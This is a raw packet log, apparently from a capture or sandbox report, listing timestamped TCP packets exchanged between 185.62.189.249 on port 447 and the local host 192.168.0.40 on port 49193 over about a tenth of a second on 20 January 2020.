Jan 20, 2020 14:20:30.188354969 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.188409090 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.188452959 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.188566923 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.188630104 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.188690901 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.188811064 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.188970089 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.189021111 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.189078093 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.189264059 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.189388037 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.189501047 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.189547062 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.189742088 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.189770937 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.189908028 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.190012932 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.190046072 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.190191031 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.190213919 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.190355062 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.190362930 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.190478086 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.190645933 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.190718889 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.190804005 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.190833092 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.190933943 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.190970898 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.191149950 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.191232920 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.191343069 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.191344023 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.191437960 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.191514015 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.191576958 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.191596031 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.191711903 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.191776037 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.191833973 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.191869020 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.191956043 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.191962957 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.192086935 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.192127943 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.192245960 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.192256927 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.192364931 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.192372084 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.192476988 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.192492008 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.192590952 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.192608118 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.192703009 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.192725897 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.192815065 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.192836046 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.192924976 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.192945957 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.193017960 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.193061113 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.193121910 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.193152905 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.193228006 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.193238020 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.193340063 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.193350077 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.193453074 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.193468094 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.193567038 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.193598986 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.193679094 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.193711996 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.193792105 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.193820953 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.193905115 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.193921089 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.194042921 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.207613945 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.207902908 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.210820913 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.210843086 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.211005926 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.211036921 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.211121082 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.211133957 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.211177111 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.211266994 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.211369038 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.211381912 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.211388111 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.211517096 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.211525917 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.211639881 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.211735964 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.211749077 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.211941957 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.211952925 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.212315083 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.212435961 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.212470055 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.212605000 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.212645054 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.212652922 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.212779999 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.212806940 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.212888956 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.213006973 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.213012934 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.213082075 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.213120937 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.213160992 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.213191986 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.213282108 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.213349104 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.213447094 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.213572025 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.213624954 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.213682890 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.213732004 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.213845015 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.213854074 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.213988066 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.214025974 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.214088917 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.214200974 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.214286089 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.214309931 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.214421034 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.214442015 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.214529037 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.214647055 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.214715958 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.214757919 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.214868069 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.214947939 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.214991093 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.215109110 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.215168953 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.215215921 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.215325117 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.215361118 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.215451002 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.215562105 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.215620041 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.227617979 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.227730036 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.227936029 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.231430054 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.231622934 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.231703997 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.231904030 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.231924057 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.231960058 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.232120037 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.232141972 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.232163906 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.232281923 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.232322931 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.232336998 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.232450008 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.232510090 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.232656956 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.232707977 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.232862949 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.232994080 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.233139992 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.233299971 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.233308077 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.233330011 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.233443022 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.233516932 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.233577967 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.233681917 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.233757019 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.233779907 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.233927965 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.234011889 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.234059095 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.234173059 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.234292984 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.234297991 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.234406948 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.234479904 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.234523058 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.234616041 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.234642029 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.234700918 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.234760046 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.234796047 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.234885931 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.234985113 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.235024929 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.235116959 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.235225916 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.235284090 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.235331059 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.235446930 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.235496998 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.235558033 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.235677004 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.235727072 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.235788107 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.235915899 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.235968113 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.236016989 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.236145020 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.236195087 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.238369942 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.238548994 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.239156961 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.239248037 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.239361048 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.239424944 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.239481926 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.239602089 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.239660025 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.239715099 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.239829063 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.239896059 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.239936113 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.240107059 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.240122080 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.240143061 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.240245104 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.240297079 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.240355968 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.240477085 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.240525007 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.240583897 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.240700006 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.240763903 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.240825891 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.240936995 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.240989923 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.241787910 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.241810083 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.241852999 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.241899014 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.241940975 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.241962910 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.241975069 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.241997004 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.242017031 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.242018938 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.242036104 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.242100000 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.242108107 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.242183924 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.242221117 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.242331028 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.242408037 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.242439032 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.242549896 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.242614985 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.242661953 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.242774010 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.242826939 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.247601032 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.247708082 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.247819901 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.247905970 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.247992992 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.252173901 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.252341986 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.252361059 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.252459049 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.252554893 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.252583981 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.252700090 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.252760887 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.252791882 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.252911091 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.252968073 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.253132105 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.253225088 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.253256083 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.253299952 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.253382921 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.253407955 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.253768921 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.253887892 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.253918886 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.253931046 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.254060030 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.254126072 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.254170895 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.254281998 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.254348993 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.254365921 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.254554987 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.267601967 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.267750025 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.267966986 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.268302917 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.268419981 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.268537045 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.268588066 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.268652916 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.268735886 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.268817902 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.268959999 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.269031048 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.269051075 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.269165993 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.269187927 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.269311905 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.269453049 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.269481897 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.269582033 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.269678116 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.269762993 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.269794941 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.269920111 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.269948959 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.269989014 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.270137072 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.270286083 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.270307064 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.270325899 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.270406961 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.270503044 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.270616055 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.270637989 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.270677090 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.270741940 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.270768881 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.270919085 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.270986080 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.271094084 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.271099091 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.271251917 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.271285057 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.271365881 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.271476030 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.271538019 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.271579027 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.271709919 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.271750927 CET	49193	447	192.168.0.40	185.62.189.249
